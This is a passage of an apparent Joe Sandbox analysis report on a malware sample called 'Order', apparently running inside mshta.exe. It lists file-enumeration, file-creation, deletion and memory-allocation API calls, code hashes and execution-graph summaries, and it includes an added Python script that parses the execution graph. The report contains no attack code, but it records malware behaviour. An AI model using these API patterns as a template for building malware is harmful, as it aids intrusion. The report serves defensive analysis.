                                                                                                                                    • RTL: Resource at %p, xrefs: 019B72A3
                                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 019B7294
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                                    • Opcode ID: 963718d7ab027e94b5b04055e9231c242c29ebf9c8e1a1671cfb43f7b468bffc
                                                                                                                                    • Instruction ID: 4f744f56e53120fddc662c30c4f3aca512ea73486686a25442fbe240138f286e
                                                                                                                                    • Opcode Fuzzy Hash: 963718d7ab027e94b5b04055e9231c242c29ebf9c8e1a1671cfb43f7b468bffc
                                                                                                                                    • Instruction Fuzzy Hash: 3541F031700206ABC724DE69CD81FA6B7A5FFD4B11F100A19F95EAB280DB31E842C7D1
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                    • Opcode ID: 4d404c67786e49aee33fa26b00e39d377cac2e3a1155fdf64fbcb122c70d17ff
                                                                                                                                    • Instruction ID: c9a836eacd0326184106c82e0403cc920d64c6adda868c4d80ce856481685932
                                                                                                                                    • Opcode Fuzzy Hash: 4d404c67786e49aee33fa26b00e39d377cac2e3a1155fdf64fbcb122c70d17ff
                                                                                                                                    • Instruction Fuzzy Hash: 16318472A00619AFDB20DF2DCC40BEE77BCEB44611F444559E94DE3200EB70DA448BA1
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-
                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction ID: 5ad9ca3ae004ad3ae573d18ce675975b2022a84f7fbded479e2dd01e2e1daf13
                                                                                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction Fuzzy Hash: 0591B871E002169BDB28FF9DC880ABEBBA9EF44321F74451AE95DE72D1D7309941C721
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $$@
                                                                                                                                    • API String ID: 0-1194432280
                                                                                                                                    • Opcode ID: 2e204dd2e087b20cd4d84903dcf3b510f2fc6fe78030dee9e47cdcbf37551b0b
                                                                                                                                    • Instruction ID: dfe940a2a40959d84a4c1a8ab170deca3ced959d7272f00eb6318fa637db8cfd
                                                                                                                                    • Opcode Fuzzy Hash: 2e204dd2e087b20cd4d84903dcf3b510f2fc6fe78030dee9e47cdcbf37551b0b
                                                                                                                                    • Instruction Fuzzy Hash: 20811975D012699BDB35CB54CC44BEEBBB8BB48754F0041EAAA1DB7280D7709E85CFA0

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:2.6%
                                                                                                                                    Dynamic/Decrypted Code Coverage:4%
                                                                                                                                    Signature Coverage:2.1%
                                                                                                                                    Total number of Nodes:470
                                                                                                                                    Total number of Limit Nodes:74
                                                                                                                                     execution_graph (rendered graph; the raw node/edge token stream is omitted here). Recoverable information:
                                                                                                                                     • Entry node: b89bb0
                                                                                                                                     • Nodes carrying API calls: CoInitialize, CoUninitialize, CreateProcessInternalW, CreateThread, FindClose, FindFirstFileW, FindNextFileW, GetFileAttributesW, LdrInitializeThunk, LdrLoadDll, NtAllocateVirtualMemory, NtClose, NtCreateFile, NtDeleteFile, NtReadFile, PostThreadMessageW, RtlAllocateHeap, RtlFreeHeap, SetErrorMode, Sleep
                                                                                                                                     • Nodes labeled LdrInitializeThunk sit at addresses 3982ad0-3984650, separate from the b84180-bac8f0 range occupied by the other nodes
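The execution graph above is rendered by the report from a flat token stream in which a numeric node id followed by a hex address (and optionally one or more API names) defines a node, and `src->dst` defines a directed edge. The following Python script is an added example, not part of the Joe Sandbox report; it parses a constructed excerpt in that format (tokens copied from this report's graph for the b89bb0 entry, plus one multi-API node) and answers the questions an analyst asks of such a graph: which nodes are entry points, which APIs are reachable from each, and the shortest call chain to a given API. The function names and the interpretation of the token format are assumptions of the example.

```python
"""Parse a Joe Sandbox execution_graph token stream and query it.

Added example, not part of the report. Token format as inferred from the
report's dump: '<id> <hexaddr> [Api ...]' defines a node, '<src>-><dst>'
defines a directed edge; tokens appear in one whitespace-separated stream.
"""
import re
from collections import deque

NODE_ID = re.compile(r"^\d+$")
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Constructed excerpt: tokens copied from the report's execution_graph
# (the b89bb0 entry and its first call chain) plus one node with several
# API annotations (b96ac0) that is not connected to that entry.
SAMPLE = (
    "execution_graph 98511 b89bb0 98513 b89f7f 98511->98513 98514 b8a3d9 "
    "98513->98514 98515 bab260 98513->98515 98516 bab286 98515->98516 "
    "98521 b84180 98516->98521 98518 bab292 98519 bab2cb 98518->98519 "
    "98524 ba5770 98518->98524 98519->98514 98528 b932a0 98521->98528 "
    "98523 b8418d 98523->98518 98525 ba57d2 98524->98525 98527 ba57df "
    "98525->98527 98552 b91a80 98525->98552 98527->98519 98529 b932bd "
    "98528->98529 98531 b932d6 98529->98531 98532 ba9f70 98529->98532 "
    "98531->98523 98534 ba9f8a 98532->98534 98533 ba9fb9 98533->98531 "
    "98534->98533 98539 ba8b30 98534->98539 98540 ba8b4d 98539->98540 "
    "98546 3982c0a 98540->98546 98541 ba8b79 98543 bab600 98541->98543 "
    "98549 ba9890 98543->98549 98545 baa032 98545->98531 "
    "98547 3982c1f LdrInitializeThunk 98546->98547 98548 3982c11 "
    "98546->98548 98547->98541 98548->98541 98550 ba98ad 98549->98550 "
    "98551 ba98be RtlFreeHeap 98550->98551 98551->98545 98553 b91abb "
    "98552->98553 98568 b97f60 98553->98568 "
    "98590 b96ac0 NtClose LdrInitializeThunk LdrInitializeThunk "
    "LdrInitializeThunk 98561->98590"
)


def parse_execution_graph(text):
    """Return (nodes, edges).

    nodes: id -> (hex address, [api names in stream order])
    edges: id -> [successor ids in stream order]
    """
    nodes, edges = {}, {}
    tokens = text.split()
    i, current = 0, None
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.setdefault(m.group(1), []).append(m.group(2))
            i += 1
            continue
        if NODE_ID.match(tok) and i + 1 < len(tokens):
            # A node id is always followed by its address token.
            current = tok
            nodes[current] = (tokens[i + 1].lower(), [])
            i += 2
            continue
        if current is not None:
            # Any other token (e.g. 'NtClose') annotates the latest node.
            nodes[current][1].append(tok)
        i += 1
    return nodes, edges


def entry_nodes(nodes, edges):
    """Defined nodes that no edge points at: the graph's entry points."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return [n for n in nodes if n not in targets]


def all_apis(nodes):
    """Every API name attached to any node, deduplicated and sorted."""
    return sorted({a for _, apis in nodes.values() for a in apis})


def reachable_apis(nodes, edges, entry):
    """API names on nodes reachable from `entry` (breadth-first)."""
    seen, queue, apis = {entry}, deque([entry]), set()
    while queue:
        n = queue.popleft()
        apis.update(nodes.get(n, ("", []))[1])
        for s in edges.get(n, []):
            if s not in seen:
                seen.add(s)
                queue.append(s)
    return sorted(apis)


def call_path(nodes, edges, entry, api):
    """Fewest-edges path from `entry` to the first node carrying `api`,
    returned as a list of hex addresses; [] when unreachable."""
    parent, queue = {entry: None}, deque([entry])
    while queue:
        n = queue.popleft()
        if api in nodes.get(n, ("", []))[1]:
            path = []
            while n is not None:
                path.append(nodes[n][0])
                n = parent[n]
            return path[::-1]
        for s in edges.get(n, []):
            if s not in parent:
                parent[s] = n
                queue.append(s)
    return []


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE)
    print("APIs in graph:", all_apis(nodes))
    for entry in entry_nodes(nodes, edges):
        print(f"entry {nodes[entry][0]}: reachable APIs",
              reachable_apis(nodes, edges, entry))
        print("  path to RtlFreeHeap:",
              " -> ".join(call_path(nodes, edges, entry, "RtlFreeHeap")))
```

Run against the full token stream of a report (paste it into `SAMPLE` or read it from a file), `call_path` gives the address chain from an entry to a sensitive call such as CreateProcessInternalW or NtCreateFile, which is the chain to follow in the function listing and control-flow graphs.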

                                                                                                                                    Control-flow Graph

                                                                                                                                     control_flow_graph (rendered graph with Executed / Not Executed coloring; the raw basic-block edge list is omitted here). Recoverable information: function b89bb0, basic blocks b89bb0-b8a51e, containing a single call, to bab260 at b8a3d4; b89bb0 is also the entry node of the execution graph above.
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: *$*^$0\$2$2a$6$;$<<$H$N$Ni$O$P$S:$Sr$YK_N[!$Yv$[!$_$b$c$d$i$i$i$p$t$v$w$x>
                                                                                                                                    • API String ID: 0-4058102179
                                                                                                                                    • Opcode ID: 58cc2750c4c177d55aa02d8ffe21a997ef635dc814ab3b96c1fc2c6ea1c4c507
                                                                                                                                    • Instruction ID: ed079d63ad3910ca2fe8b92dd88b8799343d9159e3e9958df9204c09bf6506c5
                                                                                                                                    • Opcode Fuzzy Hash: 58cc2750c4c177d55aa02d8ffe21a997ef635dc814ab3b96c1fc2c6ea1c4c507
                                                                                                                                    • Instruction Fuzzy Hash: 434290B0D05228CBEBA4DF44C9947DDBBB2BB45308F1481DAC10D6B2A1CBB55AC9DF46
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 00B9C7B4
                                                                                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 00B9C7EF
                                                                                                                                    • FindClose.KERNELBASE(?), ref: 00B9C7FA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                    • Opcode ID: 02b643247ee37e29fb71ba069ff189f3b07d4961a3f1ceb9c0288d9c2fa3b2f5
                                                                                                                                    • Instruction ID: 5a97caa5c3bf17a2ffe0aa97fcca1e5ebf72d1cf20329f5df51d4bb607ff8b7e
                                                                                                                                    • Opcode Fuzzy Hash: 02b643247ee37e29fb71ba069ff189f3b07d4961a3f1ceb9c0288d9c2fa3b2f5
                                                                                                                                    • Instruction Fuzzy Hash: 793163759002487BDB20EFA4CC86FEF7BBCDB54704F1444E9B908A7191DB74AE858BA0
                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00BA930E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 8146dc83f656c23e39555d4cf45d0f022845ebfacd0d9d0861456a6c0a44dcf9
                                                                                                                                    • Instruction ID: d051254e24be58f535a8ba2efc7f95b64e548d0ff3402be7bdc6cfb8e4ab8239
                                                                                                                                    • Opcode Fuzzy Hash: 8146dc83f656c23e39555d4cf45d0f022845ebfacd0d9d0861456a6c0a44dcf9
                                                                                                                                    • Instruction Fuzzy Hash: 1F31C3B5A01208AFCB14DF99D881EEFB7F9AF8C314F108659F919A3341D730A941CBA5
                                                                                                                                    APIs
                                                                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00BA9463
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: 52345ee9a02dc39633825c52b70044db0e93e515eb4715119a8e5600abf22335
                                                                                                                                    • Instruction ID: 98014d7cb826389e9b0b7c626ef80550af9cbb8984e4f37b3b51162f173e33fa
                                                                                                                                    • Opcode Fuzzy Hash: 52345ee9a02dc39633825c52b70044db0e93e515eb4715119a8e5600abf22335
                                                                                                                                    • Instruction Fuzzy Hash: 5931D0B5A05208ABDB14DF98D881EEFB7F9EF88314F108159F918A3341D670A912CFA5
                                                                                                                                    APIs
                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00B91E3E,?,00BA811F,00000000,00000004,00003000,?,?,?,?,?,00BA811F,00B91E3E,00000000,?,00BA811F), ref: 00BA9745
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                    • Opcode ID: b809056b41450f226baa42552bf6483264b00ddbbc1db0709ba2ecbcd3187c74
                                                                                                                                    • Instruction ID: 20f083c7685be1c04df6b58bfbd2c82fd9d75d8b388e397870db0a6158d591c5
                                                                                                                                    • Opcode Fuzzy Hash: b809056b41450f226baa42552bf6483264b00ddbbc1db0709ba2ecbcd3187c74
                                                                                                                                    • Instruction Fuzzy Hash: 7B2104B5A01208AFDB14DF98D881EEFB7B9EF89310F108549F918A7341D770A952CBA1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                    • Opcode ID: 225a0f040e93abd9e25d79b78a3da95a38aee19e96f2f43a2f4b4b14f865c0b1
                                                                                                                                    • Instruction ID: bcf3b42276749aded392588faaba1cd95655f9eb470cf8ffdec0a11a27e00858
                                                                                                                                    • Opcode Fuzzy Hash: 225a0f040e93abd9e25d79b78a3da95a38aee19e96f2f43a2f4b4b14f865c0b1
                                                                                                                                    • Instruction Fuzzy Hash: 3D115E71A01208BAD620EA58DC42FEFB7ACEB85314F108499F908A6241DA717A46CBA1
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00BA9544
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                    • Instruction ID: ea4ba26af8d545510f221ef87589bf7af8695889a0e8f567eeaa40d54ac2088d
                                                                                                                                    • Opcode Fuzzy Hash: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                    • Instruction Fuzzy Hash: A8E046362002147BDA20BA5ACC41FEB77ADEBC9764F044459FA0DA7282DA70B9018BF1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 8db06630b595b8c3da39b85cfdd079338cdc7ce4cbdef9c0eb650d1ca32d1e91
                                                                                                                                    • Instruction ID: 398eff72a9de63b0749972ae1fcfc9ca767715d3c27eea5b3efbf02d3b4f5243
                                                                                                                                    • Opcode Fuzzy Hash: 8db06630b595b8c3da39b85cfdd079338cdc7ce4cbdef9c0eb650d1ca32d1e91
                                                                                                                                    • Instruction Fuzzy Hash: 3B90023160A90412B540B15C4888546404997E1301B55C016E0428554C8B158A565365
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: b46feff7b706086df71245195aeba3b079190d11ea9cbfd29ea1111701c65eaf
                                                                                                                                    • Instruction ID: 1d05e7f44037ef4b43deca0876a9d52b48a5454dd59bbef902fc7b88872d1020
                                                                                                                                    • Opcode Fuzzy Hash: b46feff7b706086df71245195aeba3b079190d11ea9cbfd29ea1111701c65eaf
                                                                                                                                    • Instruction Fuzzy Hash: 77900261606604426540B15C4808406604997E2301395C11AA0558560C87198955926D
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: e387a73ba543604a2ca92d9b58d6f1ae1bc8c4c2159bc8eaeb4c137020bdf977
                                                                                                                                    • Instruction ID: eddfb41b48ab0a7bf316afda9af97af234c125e5badfd12cf286b97bb5eb8745
                                                                                                                                    • Opcode Fuzzy Hash: e387a73ba543604a2ca92d9b58d6f1ae1bc8c4c2159bc8eaeb4c137020bdf977
                                                                                                                                    • Instruction Fuzzy Hash: 0590023160A50C02F550B15C4418746004987D1301F55C016A0028654D87568B5576A5
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4dc7d5245d7b1e1c2736b3f84893833684dd60e2a2240b1c7e810470c079035e
                                                                                                                                    • Instruction ID: 166f8024ac2b1d54578593dba8af8623e11549e6d8428bc55d09779fd1dec74f
                                                                                                                                    • Opcode Fuzzy Hash: 4dc7d5245d7b1e1c2736b3f84893833684dd60e2a2240b1c7e810470c079035e
                                                                                                                                    • Instruction Fuzzy Hash: FB90023120650C02F580B15C440864A004987D2301F95C01AA0029654DCB168B5977A5
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 0456101a935c1e999334966f528a35f61359794ee63aef1fb0b77ceff8a2b5f0
                                                                                                                                    • Instruction ID: 90866ab4d2cd298020ef301b39b55f63cb783aacf54dda8497b8afea7612a756
                                                                                                                                    • Opcode Fuzzy Hash: 0456101a935c1e999334966f528a35f61359794ee63aef1fb0b77ceff8a2b5f0
                                                                                                                                    • Instruction Fuzzy Hash: E890023120A54C42F540B15C4408A46005987D1305F55C016A0068694D97268E55B665
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: a874f9e4e321446ff15bfa1ad9fab618a0116ac5c0b71c820544205973ff5b63
                                                                                                                                    • Instruction ID: 41914db87486c8d162ec4ab77f6f827ab70c472210ab210d27afb378f05797d2
                                                                                                                                    • Opcode Fuzzy Hash: a874f9e4e321446ff15bfa1ad9fab618a0116ac5c0b71c820544205973ff5b63
                                                                                                                                    • Instruction Fuzzy Hash: 9F900261207504036505B15C4418616404E87E1201B55C026E1018590DC62689916129
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 3ea78303b3ffb41fa4fb6460dba812adca6212c83ba2b7254cf1d1cc1566c368
                                                                                                                                    • Instruction ID: da50f8e29e1d76f0dd302665ef590849b221a9433851774c7802cc66f7cc4810
                                                                                                                                    • Opcode Fuzzy Hash: 3ea78303b3ffb41fa4fb6460dba812adca6212c83ba2b7254cf1d1cc1566c368
                                                                                                                                    • Instruction Fuzzy Hash: 9B900225216504032505F55C0708507008A87D6351355C026F1019550CD72289615125
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 79e55c98fde1243ca34b63cae7ce699295e0e828824e5ecdaa013db77ba9e4c1
                                                                                                                                    • Instruction ID: 2ba48e29fcc45efaf6ec27d7604bfa4059a76464135b6658ab51e282bdad1a4f
                                                                                                                                    • Opcode Fuzzy Hash: 79e55c98fde1243ca34b63cae7ce699295e0e828824e5ecdaa013db77ba9e4c1
                                                                                                                                    • Instruction Fuzzy Hash: 74900225226504022545F55C060850B048997D7351395C01AF141A590CC72289655325
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
